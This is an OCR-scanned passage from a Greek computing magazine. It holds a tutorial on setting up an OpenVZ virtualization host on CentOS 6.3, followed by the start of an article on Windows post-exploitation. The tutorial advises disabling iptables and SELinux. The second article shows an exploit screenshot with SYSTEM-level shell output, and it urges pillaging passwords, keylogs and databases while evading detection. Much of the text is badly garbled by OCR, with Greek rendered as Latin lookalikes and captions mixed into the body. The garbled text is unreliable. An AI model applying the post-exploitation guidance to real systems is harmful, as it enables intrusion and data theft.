και τα εικονικἁ μηχανήματα χρησιμοποιούν τον πυρήνα του host OS, θα 
πρέπει κι εκεἰνα να τρέχουν Linux. Εκ πρώτης ὀψεως, αυτός ο περιο- 
ρισµός μοιάζει πολὺ δεσµευτικὀς. Αν όμως το καλοσκεφτεἰτε, θα δείτε 
ότι δεν εἶναι. Όπως εἰπαμε, η λύση που παρουσιάζουμε προορίζεται για 
μηχανήματα µε ελάχιστους πόρους, στα οποία θα ἠταν ανόητο να φορτώ- 
σουµε δύο λειτουργικἀ συστήµατα, N.X., µε παραθυρικὀ περιβάλλον (Eva 
εἶναι το host OS και το ἆλλο To guest OS, εντὸς κάποιου VM). Εξάλλου, ο 
στόχος µας εἶναι να φτιάξουμε va μικρὸ εικονικὀ δίκτυο μέσα σ’ Eva και 
µόνο μηχάνημα, ὡστε να κάνουμε εὐκολα τις δοκιμὲς µας. Και για va Ka- 


OpenVz: AK-47s, for everyone! (μέρο 


Αα 


ταλάβετε τι εννοούμε όταν μιλάμε για “Eva μηχάνημα περιορισμένων nò- 
ρων”, θα σας πούμε μόνο αυτό: O γράφων EXE! εγκαταστήσει TO OpenVZ 
σε Eva σύστημα µε επεξεργαστἠ Atom και 2GB μνήμης RAM! Σε αυτό το 
σύστημα ἐχει σηκώσει τρεις EIKOVIKEG μηχανές. Στη μία λειτουργεί η Tpi- 
ada nginx-php-MySQL, στην ἄλλη Evac Minecraft server και στην τρίτη 
ἑνας wpalotatoc FTP server. Σημειώστε ὁτι το σύστημα θα σήκωνε ἄνετα 
και τέταρτη ἡ ακόµη και πέμπτη εικονικἡ μηχανὴ! 


Η ἄλλη πλευρά του Linux 


Οι developers Tou OpenVZ δείχνουν µια ιδιαίτερη αγάπη προς τις διανο- 
μὲς που βασίζονται στο Red Hat, ὁπως To CentOS, το Fedora και φυσικἁ 
το ἰδιο το Red Hat. Εμείς, ano τη μεριά µας, ἐχουμε συνηθίσει να χρησι- 
μοποιούμε διανομές Linux βασισμένες στο Debian. Ίσως To ἰἴδιο κι εσείς. 
Έτσι, κἄποια πράγματα ενδέχεται να µας παραξενέψουν λίγο στην apxn. 
Το Red Hat προσανατολίζεται σε περιβάλλοντα enterprise και δεν εἶναι 
ρυθμισμένο για απλἠ/οικιακἠ χρήση. Το ἰδιο ισχύει και για συγγενείς δια- 
νομές, αλλά δεν θα μασήσουμε ;) 


Για αρχἡ θα χρειαστούμε Ta DVD εγκατάστασης του CentOS, τα οποία 
μπορούμε να βρούμε ano το επἰσημο site (https://www.centos.org). Ano 
εκεἰ πρέπει να κατεβάσουµε την πιο πρόσφατη ἐκδοση και τη στιγµή που 
γράφονται αυτὲς οι γραμμὲς, πρὀκειται για την 6.3. Προσοχή: Θα χρεια- 
OTOUHE την ἐκδοση DVD και ὀχι To Live CD! Σημειώστε ὁτι πρόκειται για 
δύο DVD και παρόλο που η εγκατάσταση απαιτεί μόνο το πρώτο, θα σας 
προτείναµμε να κατεβάσετε και τα δύο... Εἶναι ζήτημα τάξης! Κατά τα ἄλλα, 
μπορούμε να επιλέξουμε την 64µπιτη ἡ την Ά2μπιτη εκδοχἠ της διανομῆς, 
σύμφωνα HE TIG προδιαγραφές του μηχανἡματὸς µας. Αφού κατεβάσουμε 
τα δύο images, αρκεί να γράψουμε το πρῶτο (EKEIVO που αντιστοιχεί στο 
δισκάκι 1) και να μπουτάρουµε απὀ αυτὸ το μηχάνημα που σκοπεύουµε 
να HETATPEWOUHE σε φάρμα εικονικὠν μηχανών (το φυσικὀ μηχάνημα 
μέσα στο onoio βρίσκεται η φάρμα, ονομάζεται OpenVZ node). Av nave 


Welcome to CentOS 6.3! 


[Install or upgrade an existing system 
Install system with basic video driver 
Rescue installed systen 

Boot from local drive 

Memory test 


Press [Tab] to edit options 


Automatic boot in 58 seconds... 


CentOS 6 


Community ENTerprise Operating System 


Προετοιμασίες για 
την εγκατάσταση 
του CentOS 6.3. 
Κατεβάσαμε Ta 
DVD, ρυθµίσαµε 
κατάλληλα το 
BIOS Tou μηχανή- 
ματος, βάλαμε το 
πρώτο DVD στον 
οδηγό και τώρα και 
ετοιµαζόμαστε να 
εγκαταστήσουµε 
το νέο λειτουργικό 
σύστημα... 
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Editing System etho 


hostname identifies the computer on a 
= network. 


= Please name this computer. The 
— Connection name: [System etho 


| Connect automatically 


Wired  802.1x Security | ΙΡν4 Settings | Ipv6 Settings 


Hostname: l ovznode.parabing.net 


Network Connections 


Method: l Manual 


Wired | @ wireless | Ñ Mobile Broadband | @ vPN | 8) DSL 


Addresses 


Name Last Used 


Netmask Gateway 
192.168.57.95 255.255.255.0 192.168.57.5 


System eth0 never 
(petete... ] 


DNS servers: 192.168.57.5] 


Search domains: | 


Close z 


M Require IPv4 addressing for this connection to complete 


Routes... 
Available to all users 


HCP client ID | 


Ήδη ano τα 
πρώτα στάδια της 
εγκατάστασης, 
δίνεται στο χρή- 
στη η ευκαιρία 

να ρυθμίσει τα 
της δικτύωσης 
του λειτουργικού 
συστήµατος. 


Προτείνουμε να όλα καλά, θα µας υποδεχτεί το μενού εγκατάστασης του CentOS. Επιλὲ- 
μην την προσπε- youue το Install or upgrade an existing system kal η περιπέτεια ξεκινά... 
pdoete. Επίσης, 

ano τη στιγμή Εγκατάσταση συστήματο 

που ουσιαστικά Υ η ΠΗ 5 

στήνετε η H εγκατάσταση του CentOS, όπως ἄλλωστε και στις περισσότερες διανο- 
ο ο, μὲς Linux, ξεκινά µε τις κλασικές ερωτήσεις για τη γλὠσσα εγκατάστα- 
δώσετε δυναμικό σης και To πληκτρολόγιο. Αφήνουμε τα προεπιλεγµένα Αγγλικά κι απλά 
IP (μέσω DHCP) συνεχίζουμε. 

αλλά σταθερὀ. Av R : A ; ; 
τώρα ὀλα αυτά Στην οθόνη που ορίζουμε hostname υπάρχει το κουµπᾶκι ονόματι 
περί IPs, δίκτυα, Configure Network. Με κλικ πάνω του μπορούμε να ρυθµίσουµε Ta της 
netmasks κ.λπ. δικτύωσης του UNO εγκατάσταση λειτουργικού. Επειδἠ ουσιαστικά μιλάμε 
σας µπερδεύουν για server, καλό εἶναι να του δώσουμε στατικὀ IP. 
κάπως, εἰναι 
Ίσως επειδή δεν Λίγο παρακάτω ο installer θα µας ρωτήσει αν σκοπεύουµε να εγκαταστἠ- 
Εχετε διαβάσει σουµε To CentOS σε κάποιον κλασικὀ σκληρὀ ἡ σε κἀποιο πιο specialized 
αυτο: http:// 

deltahacker. r - Ξ eee 

gr/?p=5138 What type of devices will your installation involve? 

Basic Storage Devices 

H υποστήριξη αυ- ® Installs or upgrades to typical types of storage devices. If you're not sure which option is right for you, 

A f this is probably it. 
των των σπανιων 
KI εξωτικών μεσων Specialized Storage Devices 
αποθήκευσης O Installs or upgrades to enterprise devices such as Storage Area Networks (SANs). This option will allow 
(βλέπε τη δεύτερη you to add FCoE / iSCSI / ΖΕΟΡ disks and to filter out devices the installer should ignore. 


επιλογή) φανερώ- 
νει τον χαρακτή- 
ρα «enterprise” 
που διακρίνει Το 
CentOs. 
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Which type of installation would you like? 


Use All Space 
55 Removes all partitions on the selected device(s). This includes partitions created by other operating 


Ὁ; κα systems. 


Tip: This option will remove data from the selected device(s). Make sure you have backups. 


Replace Existing Linux System(s) 
[95 Removes only Linux partitions (created from a previous Linux installation). This does not remove other 
O [2] partitions you may have on your storage device(s) (such as VFAT or FAT32). 


Tip: This option will remove data from the selected device(s). Make sure you have backups. 


Shrink Current System 
Shrinks existing partitions to create free space for the default layout. 


Use Free Space 
Retains your current data and partitions and uses only the unpartitioned space on the selected device 
(5), assuming you have enough free space available. 


Create Custom Layout 
= A Manually create your own custom layout on the selected device(s) using our partitioning tool. 


| @ Back | | m> Next | 


σύστημα αποθήκευσης (iSCSI, ΖΕΟΡ και FCoE). Νομίζουμε ὁτι ξέρετε 
τι πρέπει να πατήσετε’. H εγκατάσταση συνεχίζει µε ερωτήσεις για TO 
hostname του συστήματος2, την τοπικὴ ώρα και φυσικὰ το root password. 


Σηµείωση: To CentOS δεν δημιουργεί GAAov χρήστη, πέραν του 
root. Στο μηχάνημα θα συνδεόµαστε µε τον KWOIKO που δηλώσαμε 
κατά την εγκατάσταση και, μάλιστα, απευθείας ως root. Επομένως, 
καλό θα ἦταν να προσέχουμε τι πατάμε! “Mac έχει κακομάθει αυτὀ 
το Ubuntu», σκεφτόμαστε και συνεχίζουμε... 


Με τα πολλά, φτάνουμε στο πιο ενδιαφέρον στάδιο: Σε αυτὸ της δια- 
χείρισης του αποθηκευτικούὑ χώρου και του «τρόπου» εγκατάστασης. 
Edm πρέπει να επιλέξουμε το Create Custom Layout, για να καθορἰσου- 
µε μόνοι µας πόσες και ποιες κατατμήσεις θέλουμε να δημιουργηθούν. 
Θέλουμε οι EIKOVIKEG μηχανές µας 


Δεν µας αρκούν 

οι προεπιλεγμένες 
ρυθμίσεις για Ta 
partition! Θέλουμε 
να αποφασίσουµε 
μόνοι µας που θα 
πάει το καθετί, για 
va εξασφαλίσου- 
µε ὁτι τα virtual 
machines @a ano- 
θηκεύονται ξέχωρα 
απὀ το υπόλοιπο 
σύστημα. 


O σκληρὀς δίσκος 
ετοιμάζεται για 
Ἀτεμαχισμό3. Σε 
περίπτωση που 

ο δίσκος µας 
περιλαμβάνει 
κατατμήσεις ano 
προηγούμενες πε- 
ριπέτειες, εδώ θα 
τις διαγράψουμε... 


να αποθηκεύονται σε διαφορετικὀ 
χώρο απὀ το κύριο σύστημα. Δη- 

λαδἡ σε διαφορετικὀ partition και Sees MB 
πιθανώς σε διαφορετικὀ σκληρὀ. 


Drive /dev/sda (32768 MB) (Model: VMware, VMware Virtual 5) 


To OpenVZ αποθηκεύει τα virtual Size | Mount Point/ 


machines στον κατάλογο /vz. Eno- see (MB) RAlD/Volume "YP Format 

µένως, αρκεἰ va δηµιουργήσου- Y Hard Drives 

µε τρεις κατατμήσεις: Mia για το v sda 

σύστημα (µε mount point To ‘Y”), diis - 

µία για τις εικονικὲς μηχανές (µε 

mount point το “/vz”) και μία για [create | : [Reset 


το swap. Ξέρουμε ὁτι αυτή η διευ- hoa 


θέτηση των κατατμήσεων δεν εἶναι 
και η καλύτερη για Eva σύστημα. 
Συνήθως χρησιμοποιούνται περισ- 


1, Μα, φυσικἀ, σε απλό σκληρὀ! Και µη ρωτήσετε τι σημαίνουν τα άλλα :D 
2, Δυο ιδέες για hostname, εμπνευσμένες and τον κόσμο του virtualization: hydra και cerberus. Το πιάσατε, ἐτσι; 


| Back | | mp Next 
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H κατάτµηση για 
το λειτουργικό 
σύστημα πρέπει va 
έχει μέγεθος κοντά 
στα 10GB. Εδώ 
που Ta λέμε, αυτός 
ο χώρος εἰναι na- 
ραπάνω κι απὀ αρ- 
KETOG για το εἶδος 
της εγκατάστασης 
που θα πραγµα- 
τοποιήσουµε Kal 
για Ta πακέτα που 
θα προσθέσουμε 
αργὀτερα... 


Το μεγαλύτερο 
partition Tou 
συστήματος εἰναι 
εκείνο στο οποίο 
θα αποθηκεύο- 
νται οι εικονικές 
μηχανές. Εμείς 
του δώσαμε περί 
τα 20GB, γιατί ο 
δίσκος µας ἦταν 
μικρὸς και δεν 
απἐµενε περισσὀ- 
τερος χώρος. Εσείς 
μπορείτε κάλλιστα 
να αφιερώσετε 
περισσότερο χώρο. 
Δεν θα πάει χαμέ- 
νος ;) 


Έτσι εμφανιζόταν 

ο δίσκος στο δικὀ 
µας σύστημα, αφού 
δημιουργήσαμε τις 
απαραίτητες KaTa- 
τμήσεις... 
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Add Partition σότερες και σχεδὸν κάθε τμήμα του 

Mount point: [ἠ ~] . συστήµατος τοποθετείται στη δικἠ 
lesystem ΕΞ | του. Ωστόσο, για το σκοπὀ µας, 
Επ a που εἶναι η δηµιουργία ενὸς μικρού 

Allowable Drives: OpenVZ node, οι τρεις κατατμήσεις 


εἶναι µια χαρά. Νομίζουμε ὁτι ο χει- 
=| ρισμὸς οποιουδήποτε προγράμμα- 


size (MB): 10000 B , 1 

Additional size Options Toc yia Th δημιουργία κατατµησεων 
σαι --- δεν σας τρομάζει, οὐτε σας ξενἰζει. 
© Fill all space up to (MB): [10000 s 


O Fill to maximum allowable size Οπότε δεν θα σας ζαλίσουμε HE 
T Force to be a primary pation | πολλές λεπτομέρειες. Εμείς επιλέ- 
O Encrypt ξαμε το σύστημα αρχείων EXT4 και 

[cance |]! œ || δεν εἶχαμε το παραμικρὀ πρὀβλη- 
μα, οπότε σας προτείνουμε το ἰδιο 
Add Partition ανεπιφύλακτα. Προσοχή χρειάζεται 
στο mount point της κατάτµησης 
HE TIG EIKOVIKEG μηχανές. Θα πρέπει 
οπωσδήποτε να εἶναι ο κατάλογος 
ὙνΖ”, αφού αυτόν χρησιμοποιεί το 
OpenVZ και δεν υπάρχει κανένας 
ee — 3 λόγος va μπλέκουμε µε περιττές 
Additional size Options — “| επεμβάσεις στη συμπεριφορά του. 
© Fixed size Για τα µεγέθη των κατατµήσεων και 
O matapae ipto (MB) so Ef το noù θα βρίσκονται, δεν χρειά- 
O Fill to maximum allowable size | ζεται να πούμε πολλά. Σημειώστε 
μόνο ὁτι TO σύστημα δεν χρειάζεται 
Γωκ | ox | πάνω ano 10GB, ενώ αν το μηχά- 
——— νημὰ σας διαθέτει παραπάνω ano 


Allowable Drives: 


ΓΙ Force to be a primary partition 
ΤΙ Encrypt 


Please Select A Device 


| © . | 
Size Mount Point/ | Type Format 


(MB) RAID/Volume 


- 


5181 20000 /νΖ ext4 y 
sda2 10000 / ext4 Ν᾽ 
sda3 2767 swap ν΄ 


OpenVZ: AK-47s, for everyone! (μέρος 1) 
OLLIE ah ih hp hss ddchctedcdcddcde 


ἑναν δίσκους KGAO θα ἦταν να φροντἰσετε WOTE οι EIKOVIKEG μηχανές va 
βρίσκονται κἀπου μόνες τους. 


Μετὰ ano auto το στἆδιο της εγκατάστασης, ακολουθεί η τελευταἰα αλλά 
σηµαντικἠ ερώτηση, για TO ρόλο που θα ἐχει το σὐστημάἁ µας. Θεωρητικά 
μπορούμε να επιλέξουμε οτιδήποτε θέλουμε, αλλά δεν υπάρχει λόγος 
να επιβαρύνουμε τον υπολογιστή µε ἄχρηστα πακέτα και προγράμματα. 
Επομένως, αρκεὶ να επιλέξουμε το Basic Server. 


Αμέσως µετά αναλαμβάνει δράση ο ἰδιος ο installer και ξεκινάει για εμάς 
ἑνα ολιγὀλεπτο διάλειμμα. Ξέρετε, για ασκἠσεις στα δάχτυλα, τἐντωµα 
χεριών, καφὲ, νερὀ, TOOT κ.λπ. Μετά ano λίγα λεπτά η εγκατάσταση θα 
ἐχει ολοκληρωθεὶ, ο υπολογιστής θα επανεκκινἠσει και TO VEO µας σύστη- 
μα θα µας καλωσορίσει µε µια ωραιότατη κονσόλα. Εκεἰ θα συνδεθούμε 
ως root, UE TOV KWOIKO που δώσαμε κατά την εγκατάσταση. Το ξαναλέμε: 
Συνδεὀόµαστε ως root! Το σύστημα θα κάνει οτιδήποτε ζητήσουμε, χωρὶς 
να µας ρωτήσει. Χρειάζεται ιδιαίτερη προσοχὴ, για να µην βρεθούμε να 
εγκαθιστούµε τα πάντα ano την αρχή. 


Πρώτο login κι ενηµέρωση συστήματος 


Την πρώτη σύνδεση (login) στο λογαριασμὀ του χρήστη root μπορούμε 
να την κάνουμε EiTE τοπικά, δηλαδὴ ano το ἴδιο το μηχάνημα, εἰτε αποµα- 
κρυσμένα µέσω SSH, µιας και η σχετικἠ υπηρεσία εἶναι εξ ορισμού ενερ- 
γοποιηµένη. Μια πρώτη εργασία nou προτείνεται εἶναι η αναβάθμιση του 
λειτουργικού. Προς τούτο, ενημερώνουμε πρὠτα την τοπικἠ βάση δεδο- 
μένων για τα διαθέσιµα πακέτα και τις εκδόσεις τους, πληκτρολογώντας 


yum check-update 
και μετά αναβαθµἰζουμε Ta ἠδη εγκατεστημένα p’ Eva 
yum update 
H όλη διαδικασία της αναβάθµισης ενδέχεται να διαρκέσει αρκετά λεπτὰ. 


Απενεργοποΐηση iptables 


Στο CentOS To iptables εἶναι ρυθμισμένο WOTE να μπλοκάρει την επικοι- 
νωνία µέσω κάθε port, εκτὸς του SSH. Εμεὶς όμως, τουλάχιστον για την 
@pa, δεν θέλουμε κάτι τέτοιο. Επομένως, για να µην µπλέκουµε µε TO 
iptables και τις ιδιαιτερὀτητὲς του (και τις παραξενιὲς του, δηλαδὴ) καλό 
θα ἦταν να εκτελέσουµε τα ακόλουθα: 


/etc/init.d/iptables stop 
iptables -t nat -A POSTROUTING -o eth@ -j MASQUERADE 
/etc/init.d/iptables save 
/etc/init.d/iptables start 


Με την εκτέλεση της πρώτης γραμμἠς σταματάει To iptables kal απενερ- 
γοποιούνται όλοι οι κανόνες του. Με την εκτέλεση της δεύτερης γραμμής 
προστίθεται ἑνας κανόνας στον nivaka nat, ο οποίος ουσιαστικά ενεργο- 
ποιεἰ το NAT (Network Address Translation). Αυτό ἦταν λἰγο μπερδευτικὸ, 
ἐτσι; Εἰδατε που έχουμε δίκιο ὁταν εἰπαμε ὁτι δεν χρειάζεται να μπλέξου- 
µε και πολύ µε To iptables; Me Tic τελευταίες δύο γραμμὲς αποθηκεύονται 
ΟΙ αλλαγές µας και To iptables ενεργοποιεἰται ξανά. Αν δεν καταλάβατε 
τίποτα, µην ανησυχείτε. To iptables εἶναι ολίγον στρυφνό κι ο χειρισμός 
του θα μπορούσε να αποτελέσει θέμα για ολόκληρο βιβλίο. Εμπιστευτεῖτε 
μας, κάντε ὁσα εἶπαμε παραπάνω και προχωρἠστε... 


Η λίστα µε τις 
διαθέσιμες εκδοχές 
του πυρήνα εἶναι 
αρκετά πλούσια. 
Στην πραγµατι- 
κότητα, όμως, 

οι περισσότεροι 
έχουν μοναχὰ δύο 
επιλογές! 
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Προσθήκη OpenVZ repository 


lid va εγκαταστήσουμε το OpneVZ και όλα τα παρελκόμενα, πρέπει να 
δηλώσουμε TO OXETIKO repository στο σύστημα διαχείρισης πακέτων. 
Ὅπως ἐχετε καταλάβει, το CentOS Χρησιμοποιεί το yum και ὀχι το apt, 
που συναντάμε στο Debian. H λογική όμως εἶναι ακριβώς ἴδια και αλλά- 
ζουν μόνο οι EvTOAEG. Πα να προσθέσουμε το VEO repository, αρκεἰ va 
εκτελέσουµε τα ακόλουθα: 


cd /etc/yum.repos.d 
wget http://download.openvz.org/openvz.repo 
rpm --import http://download.openvz.org/RPM-GPG-Key-OpenvVZ 


Αμέσως μετὰ θα χρειαστεἰ να φρεσκάρουµε τη βάση δεδομένων του yum 
yum check-update 

κι ἐπειτα va αναβαθµἰσουµμε µε 
yum update 


To σύστημα θα µας ρωτήσει αν θἐλουµε να αντικατασταθούν μερικὰ na- 
κέτα κι εκεἰ θα πρέπει να απαντήσουμε καταφατικἀ. Συνεχίζουμε τώρα µε 
το σημαντικότερο μέρος του εγχειρήματος. 


Εδὠ ο καλὀς ο πυρήνας! 


H λειτουργἱατου OpenVZ εἶναι oTevd συνδεδεμένη HE Tov πυρήνα (kernel) 
του συστήματος και, ὁπως υποψιάζεστε, ο “εργοστασιακός” Tou CentOS 
εἶναι ακατάλληλος. Ακριβώς γι΄ αυτό πρέπει να εγκαταστήσουμµε κάποιον 
ἄλλον. H σχετικἠ πηγὴ εἶναι το repository που προσθέσαμε πριν λίγο. Ap- 
χικά, πρέπει να εντοπἰσουμε τον πυρήνα που ταιριάζει στο σὑστημὰ µας: 


yum search vzkernel 


Με την εκτέλεση του παραπάνω θα εμφανιστεί µια λίστα µε τους διαθὲ- 
σιµους πυρήνες, καθώς και μερικά ακόµη πακέτα. Εμεὶς πρέπει να ayvon- 
σουµε τα πάντα και να εστιάσουµε στις δύο πρὠτες γραμμές: 


vzkernel.i686 : The Linux kernel 
vzkernel.x86_64 : The Linux kernel 


r 
oP root@centos:/etc/yum.repos.d ΕΒ | {8 Σς 


ΠΠ 
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Προφανώς, η επιλογή του σωστού πυρήνα εξαρτάται and την εκδοχἠ του 
CentOS την οποία έχουμε κατεβάσει κι εγκαταστήσει. Αν και εἶναι μἀλ- 
λον YVWOTO, να πούμε ὁτι ο πυρήνας για τα Ά2μπιτα συστήµατα EXE! τον 
χαρακτηρισμὀ i386. Εμεὶς πάντως εἰχαμε κατεβάσει την 64µπιτη εκδοχἠ 
του CentOS, οπὀτε συνεχίσαμε πληκτρολογώντας 


yum install vzkernel.x86_64 


H εγκατάσταση θα πὰρει λίγη wpa και στο τέλος θα χρειαστεἰ να επανεκ- 
κινήσουμε το σύστημα: 


reboot 
Εφόσον πήγαν ὁλα καλὰ, κατά την εκκίνηση του συστήματος θα δούμε 
ότι ο boot manager εμφανίζει µια νέα επιλογἠ στη λίστα µε τους διαθέσι- 
μους πυρήνες. Πρὀκειται για τον πυρήνα του OpenVZ kal, ὁπως θα δείτε, 
εἶναι ἠδη προεπιλεγμένος. Εμεὶς φυσικἁ δεν φορτώνουμε ἄλλον πυρήνα 
και αφήνουμε το σύστημα να ξεκινήσει κανονικά. 


GNU GRUB version 8.97 


(636K lower “ 10464900K upper memory) 


OpenVZ (2.6.32-842stabO61. 2) 


CentOS (2.6.32-279.5.2.e16. x86_64) 
CentOS (2.6.32-279.e16.x86_64) 


Use the t and + keys to select which entry is highlighted. 
Press enter to boot the selected OS, ‘e’ to edit the 
commands before booting, ‘a’ to modify the kernel arguments 
before booting, or ‘c’ for a command-line. 


Ρύθμιση συστήματος 


Πριν καταφέρουμε να ξεκινήσουμε το πρώτο µας virtual machine στο 
νέο µας OpenVZ node, θα χρειαστούν λίγες ακόµα ρυθμίσεις. Οι πρὠτες 
αλλαγὲς θα γίνουν στο αρχείο /etc/sysctl.conf και αφορούν στις napa- 
μέτρους του δικτύου. Συγκεκριµένα, αφού ανοίξουμε το εν λόγω αρχείο 
(π.Χχ., µε TO Nano), πρέπει να κάνουμε τις ακόλουθες αλλαγἐς/προσθήκες: 


net.ipv4.ip_forward = 1 

kernel.sysrq = 1 
net.ipv4.conf.default.send_redirects = 1 
net.ipv4.conf.all.send_redirects = ϐ 


Τέλος, οφείλουμε να GNEVEPYONOINOOUHE Eva ακόµα σύστημα προστασἰ- 
ας nou περιλαμβάνει εξ ορισμού το CentOS. Avamepouaote στο SELinux. 
Το εν λόγω σύστημα εἶναι πολύ χρήσιμο για τη θωράκιση ενὸς server, 
αλλά για το δικό µας σκοπὀ μόνο μπερδέματα και πονοκέφαλο µπορεἰ va 
προκαλέσει. Πα να το απενεργοποιἠσουµε, λοιπὀν, ανοίγουμε το αρχείο / 
etc/sysconfig/selinux και φροντίζουμε WOTE ο ορισμός SELINUX να ἐχει 
την τιµή disabled: 


SELINUX=disabled 
Αυτὸ ἠταν! Το σὐστημά µας μπορεὶ πλέον να φιλοξενεί EIKOVIKEG μηχανές 
µε το OpenVZ, χωρἰς το παραμικρὸ πρὀβλημα. Βέβαια, η δηµιουργία και 
η διαχείριση των εικονικὠν μηχανών απαιτούν ειδικἁ εργαλεία. Κάντε ¿va 
reboot και γυρίστε τώρα στη σελἰδα 86. 


Μετά την εγκατά- 
σταση του νέου 
πυρήνα, ο boot 

manager nepi- 
λαμβάνει pia νέα 
επιλογή που εἶναι 
ενεργοποιημένη 
εξ ορισμού. Αν 
δεν πειράξουµε 
τίποτα, Το σύστημα 
θα ξεκινήσει µε 
τον πυρήνα που 
απαιτείται ano To 
OpenVZ... 
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by 41i3n 


Skill: 
Intermediate 


Tags: 


pillaging, 
pivoting, 
persistence 


«ΟΚ, we're in!» Πόσες και πόσες φορές δεν 
ἔχουμε ακούσει GUTH την ατάκα; Συνηθίζεται 
σε ταινίες κατασκοπείας, στις οποἰες ἑνας 
χάκερ κάνει αποτυχημένες προσπάθειες (δύο 
το πολύ) και µετά anoKTa πλήρη πρόσβαση 
στον server µιας µυστικἠς υπηρεσίας. Συνήθως, 
στις ταινίες της κατηγορἰας ακολουθούν ἄλλα 
οκτώ keystrokes και ξαφνικά εµφανίζεται 
µια μπάρα προὀδου, υποδηλώνοντας την 
αντιγραφἠ κρίσιμων δεδομένων σε κἄποιο μέσο 
αποθήκευσης (κατἁ σειρά εμφάνισης: δισκέτα, 
mini disc, USB stick και blu-ray). Στη συνέχεια 
ο χάκερ αποσυνδέεται, μόλις Eva δευτερόλεπτο 
πριν καταφἑρει ο administrator να ολοκληρώσει 
το IP trace και να τον εντοπίσει! Βεβαίως, 
όσοι διαβάζουν το περιοδικὀ γνωρίζουν πολύ 
καλὰ ὁτι μόνο ἐτσι δεν εἶναι τα πράγματα. Η 
απόκτηση πρόσβασης σε Eva σύστημα και κυρίως 
όσα ακολουθούν, προὐποθέτουν πολύ καλἠ 
προετοιμασία και, δυστυχώς ἡ ευτυχώς, πολλές 
αποτυχημένες προσπάθειες... 


Ένα πετυχημένο 
exploit µας έδωσε 
shell access. Τώρα 
μπορούμε va εκτε- 
λούμε εντολὲς στη 
γραμμή εντολών 
του στὀχου. Το παι- 
χνίδι δεν τελείωσε. 
Μόλις ξεκινάει! 
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H ιδέα για το άρθρο ξεκίνησε ano τη fan page του περιοδικοὺ στο 
Facebook, όταν ο καλὸς φίλος giannoug ρώτησε OE TI χρησιμεύει το user 
impersonation για κάποιον που ἐχει NON αποκτήσει πρόσβαση µε δικαιώ- 
ματα διαχειριστή. Ta credentials ενὸς απλού χρήστη μπορούν να αξιοποι- 
ηθούν για το σκάλισµα και το ξεψάἀάχνισµα του στόχου, σε περιοχὲς ὁπου ο 
απλὸς χρήστης θα eixe οὗτως ἡ ἄλλως πρόσβαση. Χρησιμοποιώντας ἑναν 
απλὀ χρήστη κινούμε λιγότερες υποψίες, εἶναι πιθανότερο να περάσου- 
µε απαρατήρητο! και, τελικά, πετυχαΐνουμε το σκοπὀ µας ευκολότερα. 
Όλα αυτά δεν αποτελούν αποκλειστικἁ δικὲς µας σκέψεις. Περιγράφο- 
νται και στους κανόνες «τυπικής συμπεριφοράς» μετά ano µια επιτυ- 
χημένη εισβολἠ (post-exploitation schema‘), ὁπως προσδιορίζονται στο 
Penetration Testing Execution Standard (PTES). 


Αναλογιστήκατε ὁτι πολλὲς φορὲς, κοντὀφθαλμα θα έλεγα, αναλωνόμα- 
στε στην προσπάθεια απόκτησης πρὀσβασης, ενώ auTO που ζητάμε βρἰ- 
σκεται αλλού; Συμβαίνει αρκετά συχνὰ! Πώς θα μπορούσαμε va χρησι- 
µοποιήσουµε την υπάρχουσα πρόσβαση για περαιτέρω διερεύνηση; Πώς 
γίνεται να διατηρήσουμε την πρὀσβαση; Πώς θα εξαφανίσουµε τα ἴχνη 
μας; Όλα αυτά τα ερωτήματα βρίσκουν απάντηση σε µια σειρἀ απὀ npa- 
KTIKEG, τις οποίες πρέπει να ακολουθούμε μετὰ απὀ κάθε επιτυχημένη 
επίθεση. 


@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


php6. py 
y host path target 


pwnPhp6.php win2k8 


t Corporatio All rights re 
ache2.2.11>whoami 
nt authority 
p\bin\ e\Apache2.2.11>bcdedit find "nx" 


dedit | finc 


C:\wamp\bin\apache\Apache2.2.11>[f 


(S| @ shen | 


Πάλι θεωρία; Αμάν ρε φίλε! 


Ας επιστρέψουµε για λἰγο στο post-exploitation schema του PTES. Εκεί, 
αν εξαιρέσουμε δύο πολύ εξειδικευμένες περιπτώσεις, παρατηρούμε ὁτι 
το βασικὀ παιχνίδι μετά την επίθεση (post exploitation) παἰζεται σε πέντε 
ἄξονες. Παρακάτω ακολουθεί µια χαλαρή απὀδοση και µια σύντομη na- 
ρουσίαση καθενός εξ αυτών. 


ο Infrastructure Analysis. H φάση κατὰ την οποία προσπαθούμε 
να διαπιστώσουμε που ακριβώς βρισκόμαστε και κοιτάμε TI υπάρχει 
τριγύρω, WOTE να εντοπἰσουμε ὁλες τις πιθανὲς αδυναμίες, αλλά 
και τους πιθανούς κινδύνους. Εἱμαστε στο στόχο µας; Μήπως ei- 


1.  www.pentest-standard.org/index.php/Post_Exploitation 


Post-exploitation games on Windows 
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val κανένα honeypot; Στη φάση αυτὴἠ θα πρέπει να κινούμαστε µε 
npoooxn, µε ὁσο το δυνατὸν λιγότερες παρεμβάσεις στο αποµα- 
KPUOHEVO σύστημα, αφού αυτὲς εἶναι EUKOAO να κινήσουν υποψί- 
ες και να ενεργοποιήσουν συναγερμούς στα διάφορα συστήµατα 
ασφάλειας. 


ο Pillaging. Το σημαντικότερο ἰσως στάδιο. O λόγος για τον οποὶο 
ἠρθαμε. H επιτομή της φράσης «μέσα στην ποσότητα προκύπτει 
και η ποιότητα» ἡ αλλιὼς μάζευε κι ας εἰν’ και ρώγες. Αρπάξτε 
οτιδήποτε μπορεἰ να σας Φανεἰ ενδιαφἐρον! Αρχεία, backups, βά- 
σεις, passwords, keylogs, video feeds, VoIP data και πάει λἐγο- 
ντας. Πάρτε τα τώρα και τα αξιολογεἰτε αργότερα! Edm χρειάζεται 
προσοχἠ, ὁμως. Δεν πρέπει να πάρουμε περισσότερα ano όσα uno- 
ρούμε να κουβαλήσουμε. Ακριβώς γι’ αυτό, πρέπει προηγουμένως 
να έχουμε αξιολογήσει τους τρόπους μεταφορὰς των δεδομένων. 
Πα παράδειγµα, αν θέλουμε να πάρουμε µια βάση, πρέπει να τσε- 
κἀρουµε πρὠτα το μµἐγεθὸς της, αφού ενδέχεται να εἶναι anayo- 
ρευτικἁ μεγάλο! Επίσης, δεν πρέπει να τσιμπάμε σε καταστάσεις 
του τύπου «too good to be true». Μπορεί να παρασυρθούμε kal 
τελικἁ να εκτεθούμε. Τέλος, πρέπει οπωσδήποτε να ικανοποιούµε 
τον αρχικό µας στὀχο. Πρέπει να παΐρνουμε αυτό για το οποίο ξε- 
κινήσαμε την επἰθεση. 


ο Pivoting. H φάση κατὰ την onoia χρησιμοποιούμε το εκτεθειμένο 
